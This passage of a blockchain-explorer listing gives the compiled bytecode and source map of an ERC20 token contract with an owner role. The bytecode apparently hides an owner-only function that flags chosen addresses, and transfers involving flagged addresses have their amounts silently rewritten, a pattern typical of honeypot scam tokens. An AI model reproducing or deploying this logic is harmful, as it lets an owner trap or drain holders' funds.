ffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c3e91906113bf565b10610c4f57610c4c83610f61565b90505b82821015610c92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8990611892565b60405180910390fd5b82820360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508060015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d7d9190611149565b60405180910390a3610beb60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610e105761ceda60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b610e1b858585610f85565b5050505050565b610e2a61083f565b73ffffffffffffffffffffffffffffffffffffffff16610e48610520565b73ffffffffffffffffffffffffffffffffffffffff1614610e9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e95906118fa565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f620cabaf610bec83610f749190611918565b610f7e9190611986565b9050919050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fc1578082015181840152602081019050610fa6565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe682610f8a565b610ff08185610f94565b9350611000818560208601610fa4565b61100981610fcc565b840191505092915050565b5f6020820190508181035f83015261102c8184610fdc565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6110658261103c565b9050919050565b6110758161105b565b811461107f575f80fd5b50565b5f813590506110908161106c565b92915050565b5f819050919050565b6110a881611096565b81146110b2575f80fd5b50565b5f813590506110c38161109f565b92915050565b5f80604083850312156110df576110de611034565b5b5f6110ec85828601611082565b92505060206110fd858286016110b5565b9150509250929050565b5f8115159050919050565b61111b81611107565b82525050565b5f6020820190506111345f830184611112565b92915050565b61114381611096565b82525050565b5f60208201905061115c5f83018461113a565b92915050565b5f6020828403121561117757611176611034565b5b5f61118484828501611082565b91505092915050565b5f805f606084860312156111a4576111a3611034565b5b5f6111b186828701611082565b93505060206111c286828701611082565b92505060406111d3868287016110b5565b9150509250925092565b5f60ff82169050919050565b6111f2816111dd565b82525050565b5f60208201905061120b5f8301846111e9565b92915050565b61121a8161105b565b82525050565b5f6020820190506112335f830184611211565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261125a57611259611239565b5b8235905067ffffffffffffffff8111156112775761127661123d565b5b60208301915083602082028301111561129357611292611241565b5b9250929050565b5f805f604084860312156112b1576112b0611034565b5b5f6112be868287016110b5565b935050602084013567ffffffffffffffff8111156112df576112de611038565b5b6112eb86828701611245565b92509250509250925092565b5f806040838503121561130d5761130c611034565b5b5f61131a85828601611082565b925050602061132b85828601611082565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061137957607f821691505b60208210810361138c5761138b611335565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113c982611096565b91506113d483611096565b92508282019050808211156113ec576113eb611392565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61144c602583610f94565b9150611457826113f2565b604082019050919050565b5f6020820190508181035f83015261147981611440565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f6114b782611096565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036114e9576114e8611392565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61154e602683610f94565b9150611559826114f4565b604082019050919050565b5f6020820190508181035f83015261157b81611542565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6115dc602483610f94565b91506115e782611582565b604082019050919050565b5f6020820190508181035f830152611609816115d0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61166a602283610f94565b915061167582611610565b604082019050919050565b5f6020820190508181035f8301526116978161165e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6116d2601d83610f94565b91506116dd8261169e565b602082019050919050565b5f6020820190508181035f8301526116ff816116c6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611760602583610f94565b915061176b82611706565b604082019050919050565b5f6020820190508181035f83015261178d81611754565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117ee602383610f94565b91506117f982611794565b604082019050919050565b5f6020820190508181035f83015261181b816117e2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61187c602683610f94565b915061188782611822565b604082019050919050565b5f6020820190508181035f8301526118a981611870565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118e4602083610f94565b91506118ef826118b0565b602082019050919050565b5f6020820190508181035f830152611911816118d8565b9050919050565b5f61192282611096565b915061192d83611096565b925082820261193b81611096565b9150828204841483151761195257611951611392565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61199082611096565b915061199b83611096565b9250826119ab576119aa611959565b5b82820490509291505056fea2646970667358221220a20005761c5306e05a431204fb8fbe5972f6182bd3737303bb07b8840548fbc064736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102c2578063bdf7a8e6146102f2578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b8063715018a61461024c5780638da5cb5b1461025657806395d89b4114610274578063a457c2d714610292576100fe565b806323b872dd116100d157806323b872dd1461019e578063313ce567146101ce57806339509351146101ec57806370a082311461021c576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806321860a051461016e575b5f80fd5b61010a61035a565b6040516101179190611014565b60405180910390f35b61013a600480360381019061013591906110c9565b6103ea565b6040516101479190611121565b60405180910390f35b61015861040c565b6040516101659190611149565b60405180910390f35b61018860048036038101906101839190611162565b610415565b6040516101959190611149565b60405180910390f35b6101b860048036038101906101b3919061118d565b61045b565b6040516101c59190611121565b60405180910390f35b6101d6610489565b6040516101e391906111f8565b60405180910390f35b610206600480360381019061020191906110c9565b610491565b6040516102139190611121565b60405180910390f35b61023660048036038101906102319190611162565b6104c7565b6040516102439190611149565b60405180910390f35b61025461050d565b005b61025e610520565b60405161026b9190611220565b60405180910390f35b61027c610547565b6040516102899190611014565b60405180910390f35b6102ac60048036038101906102a791906110c9565b6105d7565b6040516102b99190611121565b60405180910390f35b6102dc60048036038101906102d791906110c9565b61064c565b6040516102e99190611121565b60405180910390f35b61030c6004803603810190610307919061129a565b61066e565b005b610328600480360381019061032391906112f7565b61073b565b6040516103359190611149565b60405180910390f35b61035860048036038101906103539190611162565b6107bd565b005b60606004805461036990611362565b80601f016020809104026020016040519081016040528092919081815260200182805461039590611362565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f461083f565b9050610401818585610846565b600191505092915050565b5f600654905090565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f8061046561083f565b9050610472858285610a09565b61047d858585610a94565b60019150509392505050565b5f6012905090565b5f8061049b61083f565b90506104bc8185856104ad858961073b565b6104b791906113bf565b610846565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610515610e22565b61051e5f610ea0565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461055690611362565b80601f016020809104026020016040519081016040528092919081815260200182805461058290611362565b80156105cd5780601f106105a4576101008083540402835291602001916105cd565b820191905f5260205f20905b8154815290600101906020018083116105b057829003601f168201915b5050505050905090565b5f806105e161083f565b90505f6105ee828661073b565b905083811015610633576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161062a90611462565b60405180910390fd5b6106408286868403610846565b60019250505092915050565b5f8061065661083f565b9050610663818585610a94565b600191505092915050565b610676610520565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106ac575f80fd5b5f5b82829050811015610735578360035f8585858181106106d0576106cf611480565b5b90506020020160208101906106e59190611162565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808061072d906114ad565b9150506106ae565b50505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107c5610e22565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610833576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082a90611564565b60405180910390fd5b61083c81610ea0565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ab906115f2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610922576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091990611680565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109fc9190611149565b60405180910390a3505050565b5f610a14848461073b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a8e5781811015610a80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a77906116e8565b60405180910390fd5b610a8d8484848403610846565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af990611776565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6790611804565b60405180910390fd5b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f82905061ceda60035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c3e91906113bf565b10610c4f57610c4c83610f61565b90505b82821015610c92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8990611892565b60405180910390fd5b82820360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508060015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d7d9190611149565b60405180910390a3610beb60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610e105761ceda60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b610e1b858585610f85565b5050505050565b610e2a61083f565b73ffffffffffffffffffffffffffffffffffffffff16610e48610520565b73ffffffffffffffffffffffffffffffffffffffff1614610e9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e95906118fa565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f620cabaf610bec83610f749190611918565b610f7e9190611986565b9050919050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fc1578082015181840152602081019050610fa6565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe682610f8a565b610ff08185610f94565b9350611000818560208601610fa4565b61100981610fcc565b840191505092915050565b5f6020820190508181035f83015261102c8184610fdc565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6110658261103c565b9050919050565b6110758161105b565b811461107f575f80fd5b50565b5f813590506110908161106c565b92915050565b5f819050919050565b6110a881611096565b81146110b2575f80fd5b50565b5f813590506110c38161109f565b92915050565b5f80604083850312156110df576110de611034565b5b5f6110ec85828601611082565b92505060206110fd858286016110b5565b9150509250929050565b5f8115159050919050565b61111b81611107565b82525050565b5f6020820190506111345f830184611112565b92915050565b61114381611096565b82525050565b5f60208201905061115c5f83018461113a565b92915050565b5f6020828403121561117757611176611034565b5b5f61118484828501611082565b91505092915050565b5f805f606084860312156111a4576111a3611034565b5b5f6111b186828701611082565b93505060206111c286828701611082565b92505060406111d3868287016110b5565b9150509250925092565b5f60ff82169050919050565b6111f2816111dd565b82525050565b5f60208201905061120b5f8301846111e9565b92915050565b61121a8161105b565b82525050565b5f6020820190506112335f830184611211565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261125a57611259611239565b5b8235905067ffffffffffffffff8111156112775761127661123d565b5b60208301915083602082028301111561129357611292611241565b5b9250929050565b5f805f604084860312156112b1576112b0611034565b5b5f6112be868287016110b5565b935050602084013567ffffffffffffffff8111156112df576112de611038565b5b6112eb86828701611245565b92509250509250925092565b5f806040838503121561130d5761130c611034565b5b5f61131a85828601611082565b925050602061132b85828601611082565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061137957607f821691505b60208210810361138c5761138b611335565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113c982611096565b91506113d483611096565b92508282019050808211156113ec576113eb611392565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61144c602583610f94565b9150611457826113f2565b604082019050919050565b5f6020820190508181035f83015261147981611440565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f6114b782611096565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036114e9576114e8611392565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61154e602683610f94565b9150611559826114f4565b604082019050919050565b5f6020820190508181035f83015261157b81611542565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6115dc602483610f94565b91506115e782611582565b604082019050919050565b5f6020820190508181035f830152611609816115d0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61166a602283610f94565b915061167582611610565b604082019050919050565b5f6020820190508181035f8301526116978161165e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6116d2601d83610f94565b91506116dd8261169e565b602082019050919050565b5f6020820190508181035f8301526116ff816116c6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611760602583610f94565b915061176b82611706565b604082019050919050565b5f6020820190508181035f83015261178d81611754565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117ee602383610f94565b91506117f982611794565b604082019050919050565b5f6020820190508181035f83015261181b816117e2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61187c602683610f94565b915061188782611822565b604082019050919050565b5f6020820190508181035f8301526118a981611870565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118e4602083610f94565b91506118ef826118b0565b602082019050919050565b5f6020820190508181035f830152611911816118d8565b9050919050565b5f61192282611096565b915061192d83611096565b925082820261193b81611096565b9150828204841483151761195257611951611392565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61199082611096565b915061199b83611096565b9250826119ab576119aa611959565b5b82820490509291505056fea2646970667358221220a20005761c5306e05a431204fb8fbe5972f6182bd3737303bb07b8840548fbc064736f6c63430008140033

Deployed Bytecode Sourcemap

80:497:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1128:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3191:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2185:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;214:110:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3950:286:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1850:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7059:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1999:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;961:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4723:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2694:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;330:245:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2349:149:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1128:98:1;1182:13;1214:5;1207:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1128:98;:::o;3191:197::-;3274:4;3290:13;3306:12;:10;:12::i;:::-;3290:28;;3328:32;3337:5;3344:7;3353:6;3328:8;:32::i;:::-;3377:4;3370:11;;;3191:197;;;;:::o;2185:106::-;2246:7;2272:12;;2265:19;;2185:106;:::o;214:110:3:-;271:7;297:9;:20;307:9;297:20;;;;;;;;;;;;;;;;290:27;;214:110;;;:::o;3950:286:1:-;4077:4;4093:15;4111:12;:10;:12::i;:::-;4093:30;;4133:38;4149:4;4155:7;4164:6;4133:15;:38::i;:::-;4181:27;4191:4;4197:2;4201:6;4181:9;:27::i;:::-;4225:4;4218:11;;;3950:286;;;;;:::o;1850:91::-;1908:5;1932:2;1925:9;;1850:91;:::o;7059:234::-;7147:4;7163:13;7179:12;:10;:12::i;:::-;7163:28;;7201:64;7210:5;7217:7;7254:10;7226:25;7236:5;7243:7;7226:9;:25::i;:::-;:38;;;;:::i;:::-;7201:8;:64::i;:::-;7282:4;7275:11;;;7059:234;;;;:::o;1999:125::-;2073:7;2099:9;:18;2109:7;2099:18;;;;;;;;;;;;;;;;2092:25;;1999:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;961:102:1:-;1017:13;1049:7;1042:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;961:102;:::o;4723:427::-;4816:4;4832:13;4848:12;:10;:12::i;:::-;4832:28;;4870:24;4897:25;4907:5;4914:7;4897:9;:25::i;:::-;4870:52;;4960:15;4940:16;:35;;4932:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;5051:60;5060:5;5067:7;5095:15;5076:16;:34;5051:8;:60::i;:::-;5139:4;5132:11;;;;4723:427;;;;:::o;2694:189::-;2773:4;2789:13;2805:12;:10;:12::i;:::-;2789:28;;2827;2837:5;2844:2;2848:6;2827:9;:28::i;:::-;2872:4;2865:11;;;2694:189;;;;:::o;330:245:3:-;440:7;:5;:7::i;:::-;426:21;;:10;:21;;;417:32;;;;;;464:9;459:110;483:11;;:18;;479:1;:22;459:110;;;550:8;522:9;:25;532:11;;544:1;532:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;522:25;;;;;;;;;;;;;;;:36;;;;503:3;;;;;:::i;:::-;;;;459:110;;;;330:245;;;:::o;2349:149:1:-;2438:7;2464:11;:18;2476:5;2464:18;;;;;;;;;;;;;;;:27;2483:7;2464:27;;;;;;;;;;;;;;;;2457:34;;2349:149;;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;9507:370:1:-;9655:1;9638:19;;:5;:19;;;9630:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9735:1;9716:21;;:7;:21;;;9708:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9817:6;9787:11;:18;9799:5;9787:18;;;;;;;;;;;;;;;:27;9806:7;9787:27;;;;;;;;;;;;;;;:36;;;;9854:7;9838:32;;9847:5;9838:32;;;9863:6;9838:32;;;;;;:::i;:::-;;;;;;;;9507:370;;;:::o;10158:441::-;10288:24;10315:25;10325:5;10332:7;10315:9;:25::i;:::-;10288:52;;10374:17;10354:16;:37;10350:243;;10435:6;10415:16;:26;;10407:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10517:51;10526:5;10533:7;10561:6;10542:16;:25;10517:8;:51::i;:::-;10350:243;10278:321;10158:441;;;:::o;5603:960::-;5745:1;5729:18;;:4;:18;;;5721:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5821:1;5807:16;;:2;:16;;;5799:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;5875:19;5897:9;:15;5907:4;5897:15;;;;;;;;;;;;;;;;5875:37;;5922:15;5940:6;5922:24;;5995:6;5976:9;:15;5986:4;5976:15;;;;;;;;;;;;;;;;5960:9;:13;5970:2;5960:13;;;;;;;;;;;;;;;;:31;;;;:::i;:::-;:41;5956:84;;6015:22;6030:6;6015:14;:22::i;:::-;6005:32;;5956:84;6072:6;6057:11;:21;;6049:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;6187:6;6173:11;:20;6155:9;:15;6165:4;6155:15;;;;;;;;;;;;;;;:38;;;;6387:7;6370:9;:13;6380:2;6370:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;6435:2;6420:26;;6429:4;6420:26;;;6439:6;6420:26;;;;;;:::i;:::-;;;;;;;;6478:5;6461:9;:13;6471:2;6461:13;;;;;;;;;;;;;;;;:22;6457:53;;6502:6;6486:9;:13;6496:2;6486:13;;;;;;;;;;;;;;;:22;;;;6457:53;6519:37;6539:4;6545:2;6549:6;6519:19;:37::i;:::-;5711:852;;5603:960;;;:::o;1992:130:0:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;6569:95:1:-;6626:7;6655;6647:5;6643:1;:9;;;;:::i;:::-;:19;;;;:::i;:::-;6636:26;;6569:95;;;:::o;11187:106::-;;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:329::-;3857:6;3906:2;3894:9;3885:7;3881:23;3877:32;3874:119;;;3912:79;;:::i;:::-;3874:119;4032:1;4057:53;4102:7;4093:6;4082:9;4078:22;4057:53;:::i;:::-;4047:63;;4003:117;3798:329;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672: